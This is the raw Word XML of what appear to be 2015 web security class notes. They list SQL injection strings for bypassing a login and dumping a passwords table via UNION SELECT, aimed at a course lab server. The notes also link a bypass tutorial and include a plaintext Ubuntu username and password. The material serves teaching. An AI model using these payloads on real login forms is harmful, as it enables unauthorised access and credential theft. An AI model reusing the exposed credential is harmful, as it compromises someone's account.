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992631A" w14:textId="327298BA" w:rsidR="000C3676" w:rsidRDefault="00841562">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:r>
        <w:t>Ubuntu:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>moses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = precisios)</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00D570E8" w:rsidRPr="00D570E8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.wechall.net/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D570E8">
        <w:t xml:space="preserve">    for practicing </w:t>
      </w:r>
      <w:r w:rsidR="00D570E8">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D570E8">
        <w:br/>
      </w:r>
      <w:r w:rsidR="009A0910">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Web Security </w:t>
      </w:r>
      <w:r w:rsidR="009A0910">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009A0910">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009A0910">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009A0910">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009A0910">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009A0910">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF0AE0B" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="009A0910">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>by</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Solomon Boyd, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Jiayang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Wang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51AE6A" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9D1138" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43AA5CCC" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="009A0910">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQL INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B6D493" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7605FCC4" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="009A0910">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:r>
        <w:t>Example 1 (try this)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBEE4A9" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="009A0910">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Question Hint: ' Union select name, pass FROM passwords; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C57122A" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1360CF3E" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="009A0910">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Website: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://10.176.169.7/web_demo/week2/welcome2.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03FB4C47" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="009A0910">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: anything</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">password: ' or '1' = '1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA9EF99" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44599613" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDF3A68" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="009A0910">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:r>
        <w:t>Example 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD08A02" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="009A0910">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Website: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://10.176.169.7/web_demo/week2/welcome2.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="444B73F3" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="009A0910">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: whatever you want</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC099F" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="009A0910">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">: ' UNION SELECT name, pass FROM passwords;# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF9D228" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A00279D" w14:textId="2CEB9206" w:rsidR="000C3676" w:rsidRDefault="005E1E71">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2015</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Attack String </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>‘or’ ‘1’=’1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>‘OR pass LIKE ‘pass%</w:t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>
        <w:lastRenderedPageBreak/>
        <w:t>newUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Face’</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>,1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>);#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FC9F35" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507480AE" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="009A0910">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:r>
        <w:t>In order to understand context here is the link below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2079778B" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="00841562">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidR="009A0910">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EEBCB49" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E6F38D6" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C135F6C" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E40743F" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B86FB2" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C88B2A" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8F8DD8" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A416B29" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB8FFF9" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A57985" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E339CF0" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1870D1" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DACBC4C" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C07632" w14:textId="77777777" w:rsidR="000C3676" w:rsidRDefault="000C3676">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000C36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4AC0A3" w14:textId="77777777" w:rsidR="00D570E8" w:rsidRDefault="00D570E8" w:rsidP="00D570E8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7FCFD673" w14:textId="77777777" w:rsidR="00D570E8" w:rsidRDefault="00D570E8" w:rsidP="00D57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Lucida Grande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268AA" w14:textId="77777777" w:rsidR="00D570E8" w:rsidRDefault="00D570E8" w:rsidP="00D570E8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2FA2A1CB" w14:textId="77777777" w:rsidR="00D570E8" w:rsidRDefault="00D570E8" w:rsidP="00D570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26999"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D2AED2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922281B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A1303D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5E60172"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C0C4A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C3676"/>
    <w:rsid w:val="000C3676"/>
    <w:rsid w:val="0041718E"/>
    <w:rsid w:val="005E1E71"/>
    <w:rsid w:val="00841562"/>
    <w:rsid w:val="009A0910"/>
    <w:rsid w:val="00D5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9711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1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1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70E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0E8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D570E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0E8"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D570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1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1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70E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0E8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D570E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0E8"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D570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ecurityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection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wechall.net/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.176.169.7/web_demo/week2/welcome2.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.176.169.7/web_demo/week2/welcome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155</Words>
  <Characters>887</Characters>
  <Application>Microsoft Macintosh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Geraldo Braho</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-11-06T15:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-11-07T02:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>